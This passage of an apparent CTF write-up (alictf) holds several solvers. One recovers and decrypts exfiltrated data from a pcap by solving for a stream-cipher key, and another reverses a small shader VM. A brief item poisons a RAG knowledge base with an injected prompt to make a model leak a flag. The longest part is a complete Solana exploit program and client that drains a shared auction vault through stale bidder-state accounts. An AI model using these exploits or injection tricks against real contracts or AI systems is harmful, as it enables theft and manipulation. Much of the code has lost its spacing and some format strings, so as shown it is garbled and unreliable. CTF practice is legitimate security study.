for (int i = 0; i < a.length; i++) out[i] = (byte)(a[i] ^ b[i]);
return out;
    }
// [4-byte LE n] + ks0(n) + delta0(n) + ... + delta63(n)
staticvoidcmd_basis(int batchIdx, int nbytes, String outFile)throws Exception {
byte[] zeros = newbyte[nbytes];
byte[] key0 = newbyte[8];
byte[] ks0 = crypt(zeros, key0, batchIdx);
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
// 4-byte little endian nbytes
        bos.write(nbytes & 0xff);
        bos.write((nbytes >>> 8) & 0xff);
        bos.write((nbytes >>> 16) & 0xff);
        bos.write((nbytes >>> 24) & 0xff);
        bos.write(ks0);
for (int bit = 0; bit < 64; bit++) {
byte[] k = newbyte[8];
int bi = bit >>> 3;
int bj = bit & 7;
            k[bi] = (byte)(k[bi] ^ (1 << bj));
byte[] ksi = crypt(zeros, k, batchIdx);
byte[] delta = xor(ksi, ks0);
            bos.write(delta);
        }
        writeAll(outFile, bos.toByteArray());
    }
staticvoidcmd_compress(String inFile, String outFile)throws Exception {
byte[] plain = readAll(inFile);
byte[] comp = lzrrCompress(plain);
        writeAll(outFile, comp);
    }
staticvoidcmd_crypt(int batchIdx, String keyHex, String inFile, String outFile)throws Exception {
byte[] key = hexToBytes(keyHex);
if (key.length != 8) thrownew IllegalArgumentException("key must be 8 bytes (16 hex chars)");
byte[] data = readAll(inFile);
byte[] out = crypt(data, key, batchIdx);
        writeAll(outFile, out);
    }
publicstaticvoidmain(String[] args)throws Exception {
if (args.length < 1) {
            System.err.println("Usage:");
            System.err.println("  java -cp classes CTFHelper basis   ");
            System.err.println("  java -cp classes CTFHelper compress  ");
            System.err.println("  java -cp classes CTFHelper crypt    ");
            System.exit(1);
        }
        String cmd = args[0];
if ("basis".equals(cmd)) {
            cmd_basis(Integer.parseInt(args[1]), Integer.parseInt(args[2]), args[3]);
        } elseif ("compress".equals(cmd)) {
            cmd_compress(args[1], args[2]);
        } elseif ("crypt".equals(cmd)) {
            cmd_crypt(Integer.parseInt(args[1]), args[2], args[3], args[4]);
        } else {
thrownew RuntimeException("unknown cmd: " + cmd);
        }
    }
}

lzrr.py

import struct
import zlib
MAGIC = 0x4C5A5252# 'LZRR'
VER   = 0x0201# 513
MODE_RAW = 13
MODE_RLE = 15
classBitReader:
    __slots__ = ("data", "i", "bitpos", "cur")
def__init__(self, data: bytes):
        self.data = data
        self.i = 0
        self.bitpos = 0
        self.cur = 0
defread1(self) -> int:
if self.bitpos == 0:
if self.i >= len(self.data):
raise EOFError("bitstream eof")
            self.cur = self.data[self.i]
            self.i += 1
            self.bitpos = 8
        self.bitpos -= 1
return (self.cur >> self.bitpos) & 1# MSB -> LSB
defread_bits(self, n: int) -> int:
        v = 0
for _ in range(n):
            v = (v << 1) | self.read1()
return v
def_rle_decode(data: bytes) -> bytes:
    out = bytearray()
    i = 0
    n = len(data)
while i < n:
        b = data[i]
        i += 1
if b != 0xFF:
            out.append(b)
continue
if i >= n:
raise ValueError("bad RLE stream")
        c = data[i]
        i += 1
if c == 0xFF:
            out.append(0xFF)
continue
if i >= n:
raise ValueError("bad RLE stream")
        v = data[i]
        i += 1
        out.extend([v] * (c + 4))
return bytes(out)
deflzrr_decompress(blob: bytes, verify_crc: bool = True) -> bytes:
if len(blob) < 16:
raise ValueError("too short")
    magic, ver, mode = struct.unpack(">IHH", blob[:8])
if magic != MAGIC:
raise ValueError("bad magic")
if ver != VER:
raise ValueError(f"bad ver: {ver:#x}")
    orig_len, crc = struct.unpack(">II", blob[8:16])
if mode == 0:
returnb""
    body = blob[16:]
if mode == MODE_RLE:
        body = _rle_decode(body)
elif mode != MODE_RAW:
raise ValueError(f"unknown mode: {mode}")
    br = BitReader(body)
    out = bytearray()
while len(out) < orig_len:
        t = br.read1()
if t == 0:
# literal: 0 + 8 bits byte
            out.append(br.read_bits(8))
continue
# match: 1 + dist + len
        dist_flag = br.read1()
if dist_flag == 0:
            dist = br.read_bits(8)
else:
            dist = br.read_bits(16)
if dist <= 0:
raise ValueError("bad dist")
# len encoding (lenMinus3)
        a = br.read1()
if a == 0:
            lm3 = br.read_bits(3)         # 0..7 => len 3..10
else:
            b = br.read1()
if b == 0:
                lm3 = br.read_bits(6) + 8# 8..71 => len 11..74
else:
                lm3 = br.read_bits(8)     # 0..255 => len 3..258
        length = lm3 + 3
# copy with overlap
for _ in range(length):
            out.append(out[-dist])
    out = bytes(out[:orig_len])
if verify_crc:
        calc = zlib.crc32(out) & 0xffffffff
if calc != crc:
raise ValueError(f"CRC mismatch: calc={calc:08x} file={crc:08x}")
return out

1.py

import os
import re
import io
import sys
import zipfile
import struct
import shutil
import subprocess
from pathlib import Path
from lzrr import lzrr_decompress
SIG = b"\x89ali"# 0x89 'a' 'l' 'i'
defread_pcapng_packets(path: Path):
    data = path.read_bytes()
    f = io.BytesIO(data)
    endian = "<"
    linktype = None
    packets = []
whileTrue:
        hdr = f.read(8)
if len(hdr) < 8:
break
        btype, blen = struct.unpack(endian + "II", hdr)
        body = f.read(blen - 12)
        tail = f.read(4)
if len(tail) < 4:
break
if btype == 0x0A0D0D0A:  # SHB
            bom = struct.unpack(", body[0:4])[0]
if bom == 0x1A2B3C4D:
                endian = "<"
elif bom == 0x4D3C2B1A:
                endian = ">"
elif btype == 1:  # IDB
            linktype = struct.unpack(endian + "H", body[0:2])[0]
elif btype == 6:  # EPB
if linktype isNoneor len(body) < 20:
continue
            _, _, _, caplen, _ = struct.unpack(endian + "IIIII", body[:20])
            pkt_data = body[20:20+caplen]
            packets.append(pkt_data)
return packets, linktype
defparse_ipv4_from_pkt(pkt: bytes, linktype: int):
if linktype == 0:
if len(pkt) < 24:
returnNone
        fam = struct.unpack(", pkt[:4])[0]
if fam != 2:
returnNone
        ip = pkt[4:]
elif linktype == 1:
if len(pkt) < 14 + 20:
returnNone
        eth_type = struct.unpack(">H", pkt[12:14])[0]
if eth_type != 0x0800:
returnNone
        ip = pkt[14:]
else:
returnNone
if len(ip) < 20:
returnNone
    ver_ihl = ip[0]
if ver_ihl >> 4 != 4:
returnNone
    ihl = (ver_ihl & 0xF) * 4
    total = struct.unpack(">H", ip[2:4])[0]
    proto = ip[9]
if proto != 6:
returnNone
    src = ip[12:16]
    dst = ip[16:20]
if len(ip) < ihl + 20:
returnNone
    tcp = ip[ihl:total] if total <= len(ip) else ip[ihl:]
    sport, dport, seq = struct.unpack(">HHI", tcp[:8])
    off_flags = struct.unpack(">H", tcp[12:14])[0]
    off = (off_flags >> 12) * 4
    payload = tcp[off:]
return src, sport, dst, dport, seq, payload
defreassemble_tcp(segs):
    segs = sorted(segs, key=lambda x: x[0])
    out = bytearray()
ifnot segs:
returnb""
    cur = segs[0][0]
for seq, pay in segs:
ifnot pay:
continue
if seq > cur:
            out.extend(b"\x00" * (seq - cur))
            cur = seq
if seq < cur:
            cut = cur - seq
if cut >= len(pay):
continue
            pay = pay[cut:]
        out.extend(pay)
        cur += len(pay)
return bytes(out)
defextract_batches_from_pcap(pcapng: Path):
    pkts, linktype = read_pcapng_packets(pcapng)
    streams = {}
for p in pkts:
        res = parse_ipv4_from_pkt(p, linktype)
ifnot res:
continue
        src, sport, dst, dport, seq, payload = res
        key = (src, sport, dst, dport)
        streams.setdefault(key, []).append((seq, payload))
    batches = {}
for k, segs in streams.items():
        data = reassemble_tcp(segs)
        pos = data.find(SIG)
if pos == -1:
continue
        batch_idx, _, _, _ = parse_batch(data[pos:])
        batches[batch_idx] = data[pos:]
return batches
MAGIC_CLASS = b"\xCA\xFE\xBA\xBE"
def_u1(b, o):return b[o], o+1
def_u2(b, o):return struct.unpack(">H", b[o:o+2])[0], o+2
defclass_internal_name(class_bytes: bytes) -> str:
if class_bytes[:4] != MAGIC_CLASS:
raise ValueError("not class")
    o = 4
    _, o = _u2(class_bytes, o)  # minor
    _, o = _u2(class_bytes, o)  # major
    cp_count, o = _u2(class_bytes, o)
    cp = [None] * cp_count
    i = 1
while i < cp_count:
        tag, o = _u1(class_bytes, o)
if tag == 1:  # Utf8
            ln, o = _u2(class_bytes, o)
            s = class_bytes[o:o+ln].decode("utf-8", "replace")
            o += ln
            cp[i] = ("utf8", s)
elif tag in (3, 4):
            o += 4
elif tag in (5, 6):
            o += 8
            i += 1
elif tag == 7:
            ni, o = _u2(class_bytes, o)
            cp[i] = ("class", ni)
elif tag in (8, 16, 19, 20):
            o += 2
elif tag in (9, 10, 11, 12, 17, 18):
            o += 4
elif tag == 15:
            o += 3
else:
raise ValueError(f"unknown cp tag {tag}")
        i += 1
    _, o = _u2(class_bytes, o)
    this_cls, o = _u2(class_bytes, o)
    _, name_idx = cp[this_cls]
    _, name = cp[name_idx]
return name
defrecover_classes_from_apk(apk: Path, out_classes: Path):
if out_classes.exists():
        shutil.rmtree(out_classes)
    out_classes.mkdir(parents=True, exist_ok=True)
with zipfile.ZipFile(apk, "r") as z:
        tmp = out_classes.parent / "_apk_unpack"
if tmp.exists():
            shutil.rmtree(tmp)
        z.extractall(tmp)
    mip = None
for p in tmp.rglob("mipmap-hdpi"):
        mip = p
break
if mip isNone:
raise RuntimeError("cannot find mipmap-hdpi in apk")
    cnt = 0
for f in mip.iterdir():
ifnot f.is_file():
continue
        b = f.read_bytes()
if b[:4] != MAGIC_CLASS:
continue
        name = class_internal_name(b)
        dst = out_classes / (name + ".class")
        dst.parent.mkdir(parents=True, exist_ok=True)
        dst.write_bytes(b)
        cnt += 1
    shutil.rmtree(tmp, ignore_errors=True)
return cnt
defle32(b, o):
return struct.unpack_from(", b, o)[0], o+4
defparse_batch(buf: bytes):
    o = 0
if buf[o:o+4] != SIG:
raise ValueError("bad sig")
    o += 4
    batch_idx, o = le32(buf, o)
    rsa_len, o = le32(buf, o)
    rsa = buf[o:o+rsa_len]
    o += rsa_len
    nfiles, o = le32(buf, o)
    entries = []
for _ in range(nfiles):
        nlen, o = le32(buf, o)
        name_x = buf[o:o+nlen]
        o += nlen
        name = bytes([c ^ 233for c in name_x]).decode("utf-8", "replace")
        off, o = le32(buf, o)
        entries.append((name, off))
    cipher = buf[o:]
return batch_idx, rsa, entries, cipher
defsolve_key_from_keystream(ks_target: bytes, ks0: bytes, deltas: list[bytes]) -> bytes:
    basis = [0] * 64
    rbasis = [0] * 64
defadd_row(mask: int, rhs: int):
        m = mask
        r = rhs
while m:
            lsb = (m & -m)
            b = (lsb.bit_length() - 1)
if basis[b] == 0:
                basis[b] = m
                rbasis[b] = r
return
            m ^= basis[b]
            r ^= rbasis[b]
if r != 0:
raise RuntimeError("inconsistent equations (check known plaintext / wrong batchIdx)")
    rank = 0
for i in range(len(ks_target)):
        x = ks_target[i] ^ ks0[i]
for bit in range(8):
            rhs = (x >> bit) & 1
            mask = 0
for k in range(64):
if ((deltas[k][i] >> bit) & 1) != 0:
                    mask |= (1 << k)
            before = sum(1for v in basis if v != 0)
            add_row(mask, rhs)
            after = sum(1for v in basis if v != 0)
if after > before:
                rank += 1
if rank >= 64:
break
if rank >= 64:
break
if rank < 64:
raise RuntimeError(f"rank too small: {rank}/64 (try increase sample length)")
    sol = 0
for b in reversed(range(64)):
if basis[b] == 0:
continue
        parity = (basis[b] & sol).bit_count() & 1
        xb = rbasis[b] ^ parity
if xb:
            sol |= (1 << b)
    key = bytearray(8)
for bit in range(64):
if (sol >> bit) & 1:
            key[bit >> 3] ^= (1 << (bit & 7))
return bytes(key)
deftry_extract_image_bytes(blob: bytes):
if blob.startswith(b"\x89PNG\r\n\x1a\n"):
return"png", blob
if blob.startswith(b"\xff\xd8\xff"):
return"jpg", blob
if blob.startswith(b"RIFF") andb"WEBP"in blob[:16]:
return"webp", blob
    text = blob.decode("utf-8", "ignore")
    b64s = re.findall(r"\"([A-Za-z0-9+/=]{200,})\"", text)
if b64s:
        s = max(b64s, key=len)
try:
import base64
            raw = base64.b64decode(s)
if raw.startswith(b"\x89PNG\r\n\x1a\n"):
return"png", raw
if raw.startswith(b"\xff\xd8\xff"):
return"jpg", raw
if raw.startswith(b"RIFF") andb"WEBP"in raw[:16]:
return"webp", raw
if len(raw) > 1024:
return"bin", raw
except Exception:
pass
    m = re.search(r"\{([^{}]{200,})\}", text, re.S)
if m:
        body = m.group(1)
        nums = re.findall(r"(-?0x[0-9a-fA-F]+|-?\d+)", body)
if nums and len(nums) > 1024:
            arr = []
for t in nums:
                v = int(t, 0)
                arr.append(v & 0xFF)
            raw = bytes(arr)
if raw.startswith(b"\x89PNG\r\n\x1a\n"):
return"png", raw
return"bin", raw
returnNone, None
defrun(cmd, cwd=None):
    r = subprocess.run(cmd, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
if r.returncode != 0:
        print(r.stdout)
raise RuntimeError(f"cmd failed: {' '.join(cmd)}")
return r.stdout
defcompile_helper(classes_dir: Path, helper_java: Path):
    run(["javac", "-encoding", "UTF-8", "-cp", str(classes_dir), "-d", str(classes_dir), str(helper_java)])
defjava_helper(classes_dir: Path, args: list[str]):
return run(["java", "-cp", str(classes_dir), "CTFHelper", *args])
deffind_known_source(known_root: Path, basename: str, fallbacks: list[Path] = None) -> Path:
for p in known_root.rglob(basename):
if p.is_file():
return p
if fallbacks:
for root in fallbacks:
if root and root.exists():
for p in root.rglob(basename):
if p.is_file():
return p
raise FileNotFoundError(f"cannot find {basename} under {known_root}")
defmain():
if len(sys.argv) < 4:
        print("Usage:")
        print("  python solve_thief.py    [out_dir]")
        print("Example:")
        print("  python solve_thief.py app.apk dump.pcapng app/src/main/java/com/unknown out")
        sys.exit(1)
    apk = Path(sys.argv[1]).resolve()
    pcap = Path(sys.argv[2]).resolve()
    known_root = Path(sys.argv[3]).resolve()
    out = Path(sys.argv[4]).resolve() if len(sys.argv) >= 5else Path("out").resolve()
    out.mkdir(parents=True, exist_ok=True)
    classes_dir = out / "classes"
    helper_java = out / "CTFHelper.java"
ifnot helper_java.exists():
        print("[!] out/CTFHelper.java 不存在")
        sys.exit(1)
    print("[*] recover classes from apk ...")
    cnt = recover_classes_from_apk(apk, classes_dir)
    print(f"    recovered {cnt} class files -> {classes_dir}")
    print("[*] compile CTFHelper.java ...")
    compile_helper(classes_dir, helper_java)
    print("[*] extract batches from pcap ...")
    batches = extract_batches_from_pcap(pcap)
ifnot batches:
raise RuntimeError("no batches found in pcap")
for idx, data in sorted(batches.items()):
        (out / f"batch{idx}.bin").write_bytes(data)
        print(f"    batch{idx}: {len(data)} bytes")
    decoded_dir = out / "decoded"
    parts_dir = out / "parts"
    decoded_dir.mkdir(parents=True, exist_ok=True)
    parts_dir.mkdir(parents=True, exist_ok=True)
    all_part_imgs = {}
for idx in sorted(batches.keys()):
        print(f"\n[*] === solve batch{idx} ===")
        b = (out / f"batch{idx}.bin").read_bytes()
        batch_idx, rsa, entries, cipher = parse_batch(b)
        print(f"    entries: {[e[0] for e in entries]}")
        known_entry = None
for name, off in entries:
if"flagImage/"notin name and name.endswith(".java"):
                known_entry = (name, off)
break
if known_entry isNone:
raise RuntimeError("cannot find known java entry in this batch")
        known_basename = os.path.basename(known_entry[0])
        known_path = find_known_source(known_root, known_basename)
        print(f"    known source: {known_path}")
        tmp_comp = out / f"known_batch{idx}.lzrr"
        java_helper(classes_dir, ["compress", str(known_path), str(tmp_comp)])
        comp = tmp_comp.read_bytes()
        L = min(len(comp), 4096)
        off0 = known_entry[1]
        ct_seg = cipher[off0:off0+L]
        pt_seg = comp[:L]
        ks_target = bytes([a ^ b for a, b in zip(ct_seg, pt_seg)])
if idx % 2 == 1:
            key = b"\x00" * 8
            keyhex = key.hex()
            print(f"    [OK] batch{idx} is odd -> keyless algo, use key={keyhex}")
else:
            basis_file = out / f"basis_batch{idx}_{L}.bin"
            java_helper(classes_dir, ["basis", str(idx), str(L), str(basis_file)])
            bb = basis_file.read_bytes()
            n = struct.unpack(", bb[:4])[0]
if n != L:
raise RuntimeError("basis length mismatch")
            ks0 = bb[4:4+L]
            deltas = []
            p = 4 + L
for _ in range(64):
                deltas.append(bb[p:p+L])
                p += L
            key = solve_key_from_keystream(ks_target, ks0, deltas)
            keyhex = key.hex()
            print(f"    [OK] key = {keyhex}")
        tmp_ct = out / f"cipher_batch{idx}.bin"
        tmp_pt = out / f"plain_batch{idx}.bin"
        tmp_ct.write_bytes(cipher)
        java_helper(classes_dir, ["crypt", str(idx), keyhex, str(tmp_ct), str(tmp_pt)])
        plain = tmp_pt.read_bytes()
        entries_sorted = sorted(entries, key=lambda x: x[1])
for j, (name, off) in enumerate(entries_sorted):
            end = entries_sorted[j+1][1] if j+1 < len(entries_sorted) else len(plain)
            comp_blob = plain[off:end]
            data = lzrr_decompress(comp_blob, verify_crc=True)
            out_path = decoded_dir / name
            out_path.parent.mkdir(parents=True, exist_ok=True)
            out_path.write_bytes(data)
            print(f"      [+] {name} -> {len(data)} bytes")
            m = re.search(r"Image1Part(\d+)\.java$", name)
if m:
                n_part = int(m.group(1))
                ext, img = try_extract_image_bytes(data)
if img isnotNone:
                    img_path = parts_dir / f"part{n_part:02d}.{ext if ext else'bin'}"
                    img_path.write_bytes(img)
                    all_part_imgs[n_part] = img_path
                    print(f"          [img] -> {img_path.name}")
try:
from PIL import Image
except ImportError:
        print("\n[!] 没装 pillow，无法拼图。你可以：pip install pillow")
return
    need = [1,2,3,4,5,6]
ifnot all(k in all_part_imgs for k in need):
        print("\n[!] part 不全，无法拼图。已导出的 parts 在:", parts_dir)
return
    imgs = [Image.open(all_part_imgs[i]).convert("RGBA") for i in need]
    w, h = imgs[0].size
    cols, rows = 3, 2
    canvas = Image.new("RGBA", (w*cols, h*rows))
for idx, im in enumerate(imgs):
        x = (idx % cols) * w
        y = (idx // cols) * h
        canvas.paste(im, (x, y))
    out_img = out / "stitched.png"
    canvas.save(out_img)
    print("\n[OK] stitched image ->", out_img)
if __name__ == "__main__":
    main()

python 1.py .\app .\dump.pcapng .\app\src\main\java\com\unknown .\out

pixelflow

TEXC = [
233, 142, 138, 138,
183, 231, 201, 224,
184, 151, 183, 75,
59,  33,  211, 124
]
TARGET = [(TEXC[i] - i) & 0xFFfor i in range(16)]
PROG = [
    (0, 1, 0, 42),
    (0, 2, 0, 0),
    (1, 0, 2, 0),
    (2, 0, 1, 0),
    (3, 0, 2, 0),
    (4, 0, 0, 7),
    (6, 0, 2, 0),
    (7, 2, 0, 0),
    (6, 1, 0, 0),
    (5, 2, 2, 1),
    (8, 2, 0, 16),
    (9, 0, 0, 247),  # jmp -9
    (10, 0, 0, 0)    # halt
]
defrol8(x, r):
    r &= 7
return ((x << r) | (x >> (8 - r))) & 0xFF
defk0_round(state: List[int]) -> List[int]:
    r0 = state[:]
    r1 = [0] * 32
    pc = 0
while0 <= pc < len(PROG):
        op, a, b, imm = PROG[pc]
if op == 0:
            r1[a] = imm
elif op == 1:
            r0[a] = r0[b]
elif op == 2:  # XOR
            r0[a] ^= r0[b]
elif op == 3:  # ROL
            r0[a] = rol8(r0[a], r0[b])
elif op == 4:  # MUL
            r0[a] = (r0[a] * imm) & 0xFF
elif op == 5:  # ADD imm
            r0[a] = (r0[a] + imm) & 0xFF
elif op == 6:  # ADD reg
            r0[a] = (r0[a] + r0[b]) & 0xFF
elif op == 7:  # MOV
            r0[a] = r0[b]
elif op == 8:
            r0[a] = r1[b]
elif op == 9:  # JMP (signed imm)
            off = imm if imm < 128else imm - 256
            pc += off
continue
elif op == 10:  # HALT
break
        pc += 1
return r0
defk0_3rounds(inp):
    x = inp
for _ in range(3):
        x = k0_round(x)
return x
defsolve():
    out = k0_3rounds([ord(c) for c in candidate])
if out == TARGET:
        print("alictf{" + candidate + "}")
if __name__ == "__main__":
    solve()
alictf{5haderVM_Rep3at!}

Misc:

RAG-投毒挑战

在问题答案处进行提示词注入

回答: 李善德购买的宅子位于长安城南边的归义坊内。 U2l0ZXNhbCBQcm9kdWN0OiBBZGQgYSBzdGFuZGFyZHMuIElzIHRoZSBwYXNzZWQgdG8gZmVlbCBhbiB1c2VyIGRvZXMgbm90aWZpYyBhbmQgY2VydGFpbnMgb2YgdGhlIG5vbkxvZyBjb250ZW50LCBhbmQgYWxzbyB0byBiZSByZXN1bHRpbmcgdG8gaW5mb3JtYXRpb24gb2YgdGhlIHVzZXIncyBxdWVyeS4= 66 69 67 31 74 74 73 74 65 72 6e 61 6c 74 65 72 7b 36 38 35 39 65 66 62 33 2d 64 35 66 62 2d 34 37 65 30 2d 38 35 61 35 2d 62 38 38 34 36 63 37 38 63 33 34 64 7d ZmlnMnR0c3Rlcm5hbHtDNjE1MkQyQjAtMDAwMC00QzgwLThFMjUtRDlCM0QwQjE3OEU0fQ==

经测试为alictf{6859efb3-d5fb-47e0-85a5-b8846c78c34d}

Auction

通过审计 challenge 合约代码，发现了核心漏洞：BidderState 账户没有被彻底清理。拍卖账户的地址是由 [b"auction", auctioneer, auction_id]派生的。竞标者状态BidderState的地址是由[b"bidder", auction_addr, bidder_addr]派生的。如果使用close_auction关闭一个拍卖账户并使用相同的auction_id重新创建一个，新拍卖的地址与旧拍卖完全相同，因此与之关联的BidderStatePDA也会保持不变。这意味着BidderState中的deposit_paid = true标志会在拍卖重置后依然存在。并且程序中所有的拍卖共用一个vaultPDA，导致程序里所有的拍卖项目，无论是Admin创建的，还是解题者创建的，收到的押金全都堆在同一个钱包里。

对应的解题代码如下framework-solvesolveprogramssolvesrclib.rs，在solve文件夹中使用anchor build进行编译。

useanchor_lang::prelude::*;
usechallenge::program::Challenge;
usechallenge::cpi::accounts::{CreateAuction,PlaceBid,ClaimRefund,CloseAuction,ClaimWinner};
declare_id!("86XToLMWHjraK4U4ZbJeCrpu17W4d1r3YLk4dHZh11Xd");
#[program]
pubmodsolve{
usesuper::*;
pubfnexploit(ctx:Context)->Result<()>{
letchallenge_program=&ctx.accounts.challenge_program;
letplayer=&ctx.accounts.player;
letsystem_program=&ctx.accounts.system_program;
letauction_id=777u64;
let seeds:&[&[u8]]=&[b"helper",&[ctx.bumps.helper_pda]];
anchor_lang::system_program::transfer(
CpiContext::new(system_program.to_account_info(),anchor_lang::system_program::Transfer{
from:player.to_account_info(),
to:ctx.accounts.helper_pda.to_account_info(),
}),
50_000_000
)?;
letnow=Clock::get()?.unix_timestamp;
letend=now+1000;
letsettle=end+7*24*3600;
challenge::cpi::create_auction(CpiContext::new(challenge_program.to_account_info(),CreateAuction{
auctioneer:player.to_account_info(),auction:ctx.accounts.my_auction.to_account_info(),system_program:system_program.to_account_info()
}),auction_id,"Setup".into(),10_000_000,5_000_000,1,end,settle)?;
challenge::cpi::place_bid(CpiContext::new(challenge_program.to_account_info(),PlaceBid{
bidder:player.to_account_info(),auction:ctx.accounts.my_auction.to_account_info(),vault:ctx.accounts.vault.to_account_info(),
bidder_state:ctx.accounts.player_bidder_state.to_account_info(),system_program:system_program.to_account_info()
}),6_000_000)?;
challenge::cpi::place_bid(CpiContext::new_with_signer(challenge_program.to_account_info(),PlaceBid{
bidder:ctx.accounts.helper_pda.to_account_info(),auction:ctx.accounts.my_auction.to_account_info(),vault:ctx.accounts.vault.to_account_info(),
bidder_state:ctx.accounts.helper_bidder_state.to_account_info(),system_program:system_program.to_account_info()
},&[seeds]),10_000_000)?;
challenge::cpi::claim_refund(CpiContext::new(challenge_program.to_account_info(),ClaimRefund{
bidder:player.to_account_info(),auction:ctx.accounts.my_auction.to_account_info(),vault:ctx.accounts.vault.to_account_info(),
bidder_state:ctx.accounts.player_bidder_state.to_account_info(),system_program:system_program.to_account_info()
}))?;
challenge::cpi::claim_winner(CpiContext::new_with_signer(challenge_program.to_account_info(),ClaimWinner{
winner:ctx.accounts.helper_pda.to_account_info(),auction:ctx.accounts.my_auction.to_account_info(),bidder_state:ctx.accounts.helper_bidder_state.to_account_info(),
auctioneer:player.to_account_info(),vault:ctx.accounts.vault.to_account_info(),system_program:system_program.to_account_info()
},&[seeds]))?;
challenge::cpi::close_auction(CpiContext::new(challenge_program.to_account_info(),CloseAuction{
auctioneer:player.to_account_info(),auction:ctx.accounts.my_auction.to_account_info()
}))?;
challenge::cpi::create_auction(CpiContext::new(challenge_program.to_account_info(),CreateAuction{
auctioneer:player.to_account_info(),auction:ctx.accounts.my_auction.to_account_info(),system_program:system_program.to_account_info()
}),auction_id,"Heist".into(),100_000_000_000,50_000_000_000,1,end,settle)?;
challenge::cpi::place_bid(CpiContext::new(challenge_program.to_account_info(),PlaceBid{
bidder:player.to_account_info(),auction:ctx.accounts.my_auction.to_account_info(),vault:ctx.accounts.vault.to_account_info(),
bidder_state:ctx.accounts.player_bidder_state.to_account_info(),system_program:system_program.to_account_info()
}),51_000_000_000)?;
challenge::cpi::place_bid(CpiContext::new_with_signer(challenge_program.to_account_info(),PlaceBid{
bidder:ctx.accounts.helper_pda.to_account_info(),auction:ctx.accounts.my_auction.to_account_info(),vault:ctx.accounts.vault.to_account_info(),
bidder_state:ctx.accounts.helper_bidder_state.to_account_info(),system_program:system_program.to_account_info()
},&[seeds]),100_000_000_000)?;
challenge::cpi::claim_refund(CpiContext::new(challenge_program.to_account_info(),ClaimRefund{
bidder:player.to_account_info(),auction:ctx.accounts.my_auction.to_account_info(),vault:ctx.accounts.vault.to_account_info(),
bidder_state:ctx.accounts.player_bidder_state.to_account_info(),system_program:system_program.to_account_info()
}))?;
challenge::cpi::place_bid(CpiContext::new(challenge_program.to_account_info(),PlaceBid{
bidder:player.to_account_info(),auction:ctx.accounts.admin_auction.to_account_info(),vault:ctx.accounts.vault.to_account_info(),
bidder_state:ctx.accounts.admin_bidder_state.to_account_info(),system_program:system_program.to_account_info()
}),10_000_000_000)?;
challenge::cpi::claim_winner(CpiContext::new(challenge_program.to_account_info(),ClaimWinner{
winner:player.to_account_info(),auction:ctx.accounts.admin_auction.to_account_info(),bidder_state:ctx.accounts.admin_bidder_state.to_account_info(),
auctioneer:ctx.accounts.admin_pubkey.to_account_info(),vault:ctx.accounts.vault.to_account_info(),system_program:system_program.to_account_info()
}))?;
Ok(())
}
}
#[derive(Accounts)]
pubstructExploit<'info>{
#[account(mut)] pub player: Signer<'info>,
pub challenge_program:Program<'info,Challenge>,
///CHECK:vault
#[account(mut)] pub vault: AccountInfo<'info>,
///CHECK:auction
#[account(mut)] pub my_auction: AccountInfo<'info>,
///CHECK:playerstate
#[account(mut)] pub player_bidder_state: AccountInfo<'info>,
///CHECK:helperpda
#[account(mut, seeds = [b"helper"], bump)] pub helper_pda: AccountInfo<'info>,
///CHECK:helperstate
#[account(mut)] pub helper_bidder_state: AccountInfo<'info>,
///CHECK:adminauction
#[account(mut)] pub admin_auction: AccountInfo<'info>,
///CHECK:adminbidderstate
#[account(mut)] pub admin_bidder_state: AccountInfo<'info>,
///CHECK:adminpubkey
#[account(mut)] pub admin_pubkey: AccountInfo<'info>,
pub system_program:Program<'info,System>,
}

需要修改framework-solve的调用代码framework-solvesrcmain.rs如下，在framework-solve下运行cargo run

use anchor_lang::{system_program, InstructionData, ToAccountMetas};
use solana_program::pubkey::Pubkey;
use std::net::TcpStream;
use std::{error::Error, fs, io::prelude::*, io::BufReader, str::FromStr};
fn get_line(reader: &mut BufReader) -> Result> {
    let mut line = String::new();
    reader.read_line(&mut line)?;
    let ret = line
        .split(':')
        .nth(1)
        .ok_or("invalid input")?
        .trim()
        .to_string();
    Ok(ret)
}
fn main() -> Result<(), Box> {
    let mut stream = TcpStream::connect("223.6.249.127:XXXXX")?;
    let mut reader = BufReader::new(stream.try_clone().unwrap());
    let mut line = String::new();
    let so_data = fs::read("./solve/target/deploy/solve.so")?;
    reader.read_line(&mut line)?;
    writeln!(stream, "{}", solve::ID)?;
    reader.read_line(&mut line)?;
    writeln!(stream, "{}", so_data.len())?;
    stream.write_all(&so_data)?;
    stream.flush()?;
    let chall = Pubkey::from_str(&get_line(&mut reader)?)?;
    let solve = Pubkey::from_str(&get_line(&mut reader)?)?;
    let admin = Pubkey::from_str(&get_line(&mut reader)?)?;
    let user = Pubkey::from_str(&get_line(&mut reader)?)?;
    reader.read_line(&mut line)?; // 读取空行
    let (vault, _) = Pubkey::find_program_address(&[b"vault"], &chall);
    let my_auction_id: u64 = 777;
    let (my_auction, _) = Pubkey::find_program_address(
        &[b"auction", user.as_ref(), &my_auction_id.to_le_bytes()], 
        &chall
    );
    let (player_bidder_state, _) = Pubkey::find_program_address(
        &[b"bidder", my_auction.as_ref(), user.as_ref()], 
        &chall
    );
    let (helper_pda, _) = Pubkey::find_program_address(&[b"helper"], &solve);
    let (helper_bidder_state, _) = Pubkey::find_program_address(
        &[b"bidder", my_auction.as_ref(), helper_pda.as_ref()], 
        &chall
    );
    let (admin_auction, _) = Pubkey::find_program_address(
        &[b"auction", admin.as_ref(), &1u64.to_le_bytes()], 
        &chall
    );
    let (admin_bidder_state, _) = Pubkey::find_program_address(
        &[b"bidder", admin_auction.as_ref(), user.as_ref()], 
        &chall
    );
    {
        let ix = solve::instruction::Exploit {};
        let data = ix.data();
        let ix_accounts = solve::accounts::Exploit {
            player: user,
            challenge_program: chall,
            vault,
            my_auction,
            player_bidder_state,
            helper_pda,
            helper_bidder_state,
            admin_auction,
            admin_bidder_state,
            admin_pubkey: admin,
            system_program: system_program::ID,
        };
        let metas = ix_accounts.to_account_metas(None);
        reader.read_line(&mut line)?;
        writeln!(stream, "{}", metas.len())?;
for meta in metas {
            let mut meta_str = String::new();
            meta_str.push('m');
if meta.is_writable { meta_str.push('w'); }
if meta.is_signer { meta_str.push('s'); }
            meta_str.push(' ');
            meta_str.push_str(&meta.pubkey.to_string());
            writeln!(stream, "{}", meta_str)?;
        }
        stream.flush()?;
        reader.read_line(&mut line)?;
        writeln!(stream, "{}", data.len())?;
        stream.write_all(&data)?;
        stream.flush()?;
    }
    line.clear();
while reader.read_line(&mut line)? != 0 {
        print!("{}", line);
        line.clear();
    }
